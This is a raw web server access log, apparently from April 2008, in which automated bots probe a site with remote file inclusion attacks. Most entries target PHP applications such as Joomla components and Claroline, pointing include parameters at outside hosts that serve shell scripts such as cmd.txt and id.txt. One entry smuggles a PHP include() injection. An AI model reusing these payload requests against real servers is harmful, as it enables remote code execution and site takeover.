85.214.50.208 - - [07/Apr/2008:10:18:31 -0700] "GET /logs/admin/index.php?o=http://www.julmy.org/genealogie/mouse.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.198.112 - - [07/Apr/2008:10:18:54 -0700] "GET /logs/access_080312.log//claroline/auth/ldap/authldap.php?includePath=http://www.suttas.com/files/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.34.218 - - [07/Apr/2008:10:18:59 -0700] "GET //index_album.php?P_INDEX=http://cyclonekey.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
85.214.34.218 - - [07/Apr/2008:10:18:59 -0700] "GET /logs//index_album.php?P_INDEX=http://cyclonekey.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
212.193.227.121 - - [07/Apr/2008:10:19:32 -0700] "GET /logs/access_080215.log//administrator/components/?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.193.227.121 - - [07/Apr/2008:10:19:32 -0700] "GET //administrator/components/?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.193.227.121 - - [07/Apr/2008:10:19:33 -0700] "GET /logs//administrator/components/?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.18.178.161 - - [07/Apr/2008:10:19:54 -0700] "GET //mcf.php?content=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:10:20:16 -0700] "GET /logs/index.php?&[holocaust]?&[holocaust]?&[holocaust]?&[holocaust]/?&mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:10:20:18 -0700] "GET /index.php?&[holocaust]?&[holocaust]?&[holocaust]?&[holocaust]/?&mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:10:20:19 -0700] "GET /logs/access_080215.log//administrator/?mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:10:20:20 -0700] "GET //administrator/?mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:10:20:21 -0700] "GET /logs//administrator/?mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.92 - - [07/Apr/2008:10:20:24 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.179.240 - - [07/Apr/2008:10:20:25 -0700] "GET /minamijewelry/source_images/ HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.193.60.15 - - [07/Apr/2008:10:20:28 -0700] "GET /encapscms_PATH/core/core.php?root=http://www.vivexperiencia.pt/site/cache/.log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
66.193.60.15 - - [07/Apr/2008:10:20:28 -0700] "GET /logs/encapscms_PATH/core/core.php?root=http://www.vivexperiencia.pt/site/cache/.log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:10:20:44 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:10:20:55 -0700] "GET /include/common_function.php?_config[site_path]=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:10:21:09 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:10:21:13 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:10:21:43 -0700] "GET /logs/access.log/index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:10:21:45 -0700] "GET /index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:10:21:46 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:10:22:16 -0700] "GET /main.php?x=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
85.214.73.237 - - [07/Apr/2008:10:22:16 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://h1.ripway.com/nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.237 - - [07/Apr/2008:10:22:17 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://h1.ripway.com/nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.237 - - [07/Apr/2008:10:22:17 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://h1.ripway.com/nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:10:22:18 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:10:22:18 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:10:22:19 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.26.137.64 - - [07/Apr/2008:10:22:19 -0700] "GET /gallery.php?nivel=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
58.26.137.64 - - [07/Apr/2008:10:22:27 -0700] "GET /logs/gallery.php?nivel=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
66.7.198.112 - - [07/Apr/2008:10:22:29 -0700] "GET //claroline/auth/ldap/authldap.php?includePath=http://www.suttas.com/files/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.133.62 - - [07/Apr/2008:10:23:20 -0700] "GET /logs/access_080306.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.xdengue.xpg.com.br/sefe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.94.1.95 - - [07/Apr/2008:10:24:20 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://scopitone.collectif-noctambules.info/templates/madeyourweb/css/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
87.94.1.95 - - [07/Apr/2008:10:24:20 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://scopitone.collectif-noctambules.info/templates/madeyourweb/css/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
67.19.6.34 - - [07/Apr/2008:10:24:20 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:10:24:48 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:10:24:49 -0700] "GET /include/common_function.php?_config[site_path]=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:10:24:59 -0700] "GET /logs/access_080329.log/index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.193.227.121 - - [07/Apr/2008:10:25:14 -0700] "GET /logs/access_080201.log//administrator/components/?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.6.34 - - [07/Apr/2008:10:25:22 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.6.34 - - [07/Apr/2008:10:25:22 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.6.34 - - [07/Apr/2008:10:25:22 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.6.34 - - [07/Apr/2008:10:25:36 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:10:25:46 -0700] "GET /logs/access_080216.log/main.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:10:25:46 -0700] "GET /logs/main.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.107.242 - - [07/Apr/2008:10:25:50 -0700] "GET //include/monitoring/engine/MakeXML.php?fileOreonConf=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:10:25:51 -0700] "GET /logs/access_080215.log//administrator/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:10:25:51 -0700] "GET //administrator/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:10:25:52 -0700] "GET /logs//administrator/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.93.107.242 - - [07/Apr/2008:10:25:52 -0700] "GET /logs//include/monitoring/engine/MakeXML.php?fileOreonConf=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
77.221.130.16 - - [07/Apr/2008:10:25:55 -0700] "GET /logs/access_080329.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.16 - - [07/Apr/2008:10:25:55 -0700] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.16 - - [07/Apr/2008:10:25:56 -0700] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
118.127.2.108 - - [07/Apr/2008:10:26:44 -0700] "GET //include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.firerunners.nl//test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
118.127.2.108 - - [07/Apr/2008:10:26:44 -0700] "GET /logs//include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.firerunners.nl//test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:10:27:04 -0700] "GET /logs/access_080219.log/index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:10:27:06 -0700] "GET /index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:10:27:07 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:10:27:10 -0700] "GET /logs/access_080218.log/index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:10:27:35 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:10:27:37 -0700] "GET /include/common_function.php?_config[site_path]=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:10:27:38 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
212.175.137.162 - - [07/Apr/2008:10:27:47 -0700] "GET /logs/access_071214.log/index.php?option=com_newsfeeds&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.175.137.162 - - [07/Apr/2008:10:27:49 -0700] "GET /index.php?option=com_newsfeeds&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
212.175.137.162 - - [07/Apr/2008:10:27:49 -0700] "GET /logs/index.php?option=com_newsfeeds&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.73.237 - - [07/Apr/2008:10:28:00 -0700] "GET /logs/access_080306.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://h1.ripway.com/nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.22.128 - - [07/Apr/2008:10:28:27 -0700] "GET /logs/access_080324.log/index.php?option=com_galleria&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.22.128 - - [07/Apr/2008:10:28:28 -0700] "GET /index.php?option=com_galleria&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.22.128 - - [07/Apr/2008:10:28:29 -0700] "GET /logs/index.php?option=com_galleria&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.32.209.240 - - [07/Apr/2008:10:29:21 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sohbetsuper.org/modules/shoutbox/box?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
72.32.209.240 - - [07/Apr/2008:10:29:22 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sohbetsuper.org/modules/shoutbox/box?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
67.18.241.218 - - [07/Apr/2008:10:29:26 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sohbetsuper.org/modules/shoutbox/box?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
67.18.241.218 - - [07/Apr/2008:10:29:26 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sohbetsuper.org/modules/shoutbox/box?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
69.89.22.128 - - [07/Apr/2008:10:29:43 -0700] "GET /logs/access.log/index.php?option=com_galleria&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.90 - - [07/Apr/2008:10:29:44 -0700] "GET /logs/access_080329.log/index.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.90 - - [07/Apr/2008:10:29:46 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.6.34 - - [07/Apr/2008:10:29:52 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sohbetsuper.org/modules/shoutbox/box?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
67.19.6.34 - - [07/Apr/2008:10:29:52 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sohbetsuper.org/modules/shoutbox/box?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.13.224.85 - - [07/Apr/2008:10:29:55 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sohbetsuper.org/modules/shoutbox/box?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
64.13.224.85 - - [07/Apr/2008:10:29:56 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sohbetsuper.org/modules/shoutbox/box?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:10:30:07 -0700] "GET /logs/access_080206.log HTTP/1.0" 200 1050557 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:10:30:17 -0700] "GET /logs/access_080329.log/index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:10:30:19 -0700] "GET /index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:10:30:20 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:10:30:30 -0700] "GET /include/common_function.php?_config[site_path]=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:10:30:30 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:10:30:33 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:10:30:33 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:10:30:33 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.158.0.5 - - [07/Apr/2008:10:30:40 -0700] "GET /logs/access_080207.log//newspublish/include.php?path[docroot]=http://td-sts.ru/modules/echo4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [07/Apr/2008:10:30:40 -0700] "GET /logs//newspublish/include.php?path[docroot]=http://td-sts.ru/modules/echo4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:10:30:41 -0700] "GET /logs/access_080201.log//administrator/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
88.158.0.5 - - [07/Apr/2008:10:30:41 -0700] "GET /logs/access_080329.log//newspublish/include.php?path[docroot]=http://td-sts.ru/modules/echo4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:10:32:15 -0700] "GET /logs/access_080201.log//administrator/?mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:10:33:57 -0700] "GET /logs/access.log//citywriter/head.php?path=http://h1.ripway.com/raru/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:10:33:57 -0700] "GET //citywriter/head.php?path=http://h1.ripway.com/raru/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:10:33:58 -0700] "GET /logs//citywriter/head.php?path=http://h1.ripway.com/raru/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:10:34:14 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:10:34:15 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:10:34:15 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:10:34:17 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:10:34:21 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:10:34:22 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:10:34:22 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:10:34:24 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
